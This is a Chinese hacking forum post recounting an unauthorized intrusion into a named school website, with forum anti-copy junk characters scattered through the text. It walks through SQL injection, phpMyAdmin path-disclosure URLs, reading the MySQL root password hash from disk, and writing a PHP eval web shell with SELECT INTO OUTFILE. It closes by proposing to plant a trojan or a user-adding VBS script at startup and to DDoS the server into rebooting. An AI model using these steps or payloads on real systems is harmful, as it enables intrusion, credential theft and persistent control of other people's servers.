第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏
& Z9 P2 G: V: W8 O发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!
5 K4 T2 T% B% J3 r$ @2 W" w( P: O4 l& p6 O! w: r
5 E8 o( }" y. W! h7 t1 E R9 r7 |
" M# H' v" e# w9 h常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限
; D' J: P' Q3 k+ Y& D, Z' i, H$ G( ?; ]- }9 \
那么想可以直接写入shell ,getshell有几个条件:9 Y! u. @/ |- ^9 Q* J0 h
1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF ; [1 H6 L" l2 u, n! Q! l* w
( n# ~8 H; N1 F6 t, p试着爆绝对路径: ( K( U% b1 @$ d5 R/ z$ U+ J# c
1./phpMyAdmin/index.php?lang[]=1
5 C$ @& ]8 B. ^8 L1 P2./phpMyAdmin/phpinfo.php . \) c: T$ B' y5 y: d
3./load_file() 9 @1 h" m" _: G: G' v
4./phpmyadmin/themes/darkblue_orange/layout.inc.php + B: P" W; a8 H, ^
5./phpmyadmin/libraries/select_lang.lib.php % _; `$ K% B9 c+ I) e
6./phpmyadmin/libraries/lect_lang.lib.php f8 j( n9 b' Z9 }5 X) h0 L
7./phpmyadmin/libraries/mcrypt.lib.php - h- ?1 e- N1 W. Y9 c0 Y
8./phpmyadmin/libraries/export/xls.php
0 P) d7 U4 b5 t3 P P3 @, B7 O8 F1 T; [
均不行........................... 5 l4 W: w% Z* [
0 D2 t% v! F" e% i御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php
/ i0 d; W1 b- V; ?2 A/ e
1 i; I) `, f/ h权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin $ _2 u' Y4 \6 R- R& r& _; C
3 T7 i( [$ `; x. M4 Q5 r
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
+ j+ p& `% X/ {$ h, l3 d
& P9 B; V. }/ z+ H' v+ i敏感东西: http://202.103.49.66/Admincp.php 社工进不去...........
" q! P% y( e$ e
* O+ v4 v2 q- n( |# v# a& k' M( z! A想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
& ~. R; R7 w1 y2 w8 B/ J0 X
" @- s: J* }7 l) }; T6 _- ` ihttp://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini
0 n5 O3 c$ V: M. V8 _: K0 J( l+ H4 ~! q! U" w7 k1 Y! d& n2 k
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
3 d6 R1 G5 x8 F" P2 R7 {: c4 ~& I: O T! G2 V# n9 O" w
成功读到root密码:
/ \) X* T; X' t- H' ?8 F3 `
9 i1 U0 Y' M9 R17---- r(0072) ' p8 ^) q, z$ K* g$ c9 I
18---- o(006f)
. s- E' R) y G19---- o(006f)
" x+ ~4 }! \) s% Y# V/ u20---- t(0074) . J+ g) w0 Z6 Q) S: W% j( z
21---- *(002a)
0 W5 \5 R+ Q% F! L22---- 8(0038) ( u$ g, O4 o' b" D
23---- 2(0032) , a2 I% p, w0 c+ a' o
24---- E(0045) & y/ c x, M$ j+ [/ }' o" \
25---- 1(0031) . ~8 Z5 g8 u* O w( Q9 z4 P7 n
26---- C(0043)
: s9 K# R' s) O* S7 G9 ^27---- 5(0035) 9 K: x! p5 k" P B5 e' S
28---- 8(0038)
( }7 h7 o$ E6 t1 N2 r! A29---- 2(0032)
, g8 T8 E& T7 Z+ _# \; g1 d30---- 8(0038) ' x5 |9 S; e' Y
31---- A(0041) " G+ h1 Y% [8 d* u
32---- 9(0039)
- U e' b" j3 @33---- B(0042) 4 [2 s2 M- L( S; `4 X5 a; `
34---- 5(0035) + t( _! O9 D- ]% z5 j5 o% d
35---- 4(0034)
# _2 z) N, D9 s36---- 8(0038)
( [5 B2 y( S+ ^* {37---- 6(0036) J* E: J* P& E1 ^) j F
38---- 4(0034) ! t( Y# V& P6 x! t. y6 y6 L+ m% G
39---- 9(0039) & V: t B+ ?- M7 V
40---- 1(0031)
9 n0 F* \1 ~7 @0 C% i S5 P41---- 1(0031)
, B; x" X# ]; @0 w1 \2 W- U42---- 5(0035)
! i( ?4 D) O3 D! }3 b' `5 n( Y43---- 3(0033) - V+ H( F* T- `6 W
44---- 5(0035) ( @6 Q8 u4 V, d2 X0 `; X* B
45---- 9(0039) , d3 w; w/ F- @3 H. X; a
46---- 8(0038) % l' A& \- p8 t! v1 }9 m
47---- F(0046)
& m& P- W9 B' q48---- F(0046)
, @# E+ `3 c/ Q* p49---- 4(0034) # p( u, j& ^4 I3 @1 o
50---- F(0046) 4 B/ |, K) C- N1 T0 {4 K( [
51---- 0(0030)
. m# ^* K/ g9 _52---- 3(0033) ) z$ s" k3 D5 h0 @) @5 y
53---- 2(0032)
$ {- n9 B; ?& y1 Q54---- A(0041) - m4 l# F1 v$ c O: x9 z* g
55---- 4(0034)
4 e: S2 }2 ]1 a+ }56---- A(0041) , N/ o1 y+ T v) t* v. d* b/ N2 @
57---- B(0042)
! u) ?1 g; L7 t2 E+ d58---- *(0044) 1 Q7 u8 U" ~2 n! _* P: J
59---- *(0035)
8 W+ s# J1 x: T% B) [4 \" T60---- *(0041) : [$ x2 e) ]" d$ r
61---- *0032)
: k" y$ ^' J5 i- d0 a. Q- z% w6 j2 i( Z* a9 N/ _
解密后成功登陆phpmyamin
) Q# H( m; \8 S( l4 n
, U1 M8 Y# ~" Y1 {9 W- ]7 D7 H8 P" q
+ v: }3 ]' N3 T; e9 z 5 O6 Y. C) N5 r% l
0 n# B1 g3 _3 z2 Q5 f/ U
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
2 O' R+ J: c7 _: O# L$ H T" a/ q$ h, V3 U
成功执行,拿下shell,菜刀连接:
2 @/ U* i" C7 A: f$ h4 T3 z6 {6 t) v6 i L K/ ^
服务器不支持asp,aspx,php提权无果...................
3 Q4 q! S+ z3 E4 ~* G
4 d, z6 l; Q/ w& A; N但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
) `& s* r$ y& Q( V. T1 u服务器上已经有个隐藏帐号了
7 g* M- A ~1 K4 }% _别名 administrators
* Y# y2 ~+ I5 `( T注释 管理员对计算机/域有不受限制的完全访问权 $ l0 T/ g6 e2 b8 j6 _5 s5 {# W
成员 ! s1 U# }- v' X! ?* U1 q. I* k. z
-------------------------------------------------------------------------------
% d9 X: C8 ^6 O9 M4 tadmin
6 ] \0 Y7 h2 t9 N* ~( y; ^5 BAdministrator7 r N0 I! s( F/ J! B7 q
slipper$2 ?6 m) C( h9 l, Z
sqluser
& b1 O" \0 `# J. x. M命令成功完成。 & R: ]- p, J/ Z( K7 B
# \0 C" D4 d! X( n9 O8 d3 _6 x
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
1 ^) m3 Y( ?7 K) a- k! D' S8 p r* Z$ w' M; z! y
ddos服务器重启,不然就只能坐等服务器重启了...............................7 s3 g/ R5 ?- |% _) V
; m( N" v' v1 e4 p- b
! y; U8 W @! B* [ | 
发表于 2013-1-11 21:32:15
收藏
支持
反对
发表于 2013-5-20 15:28:12
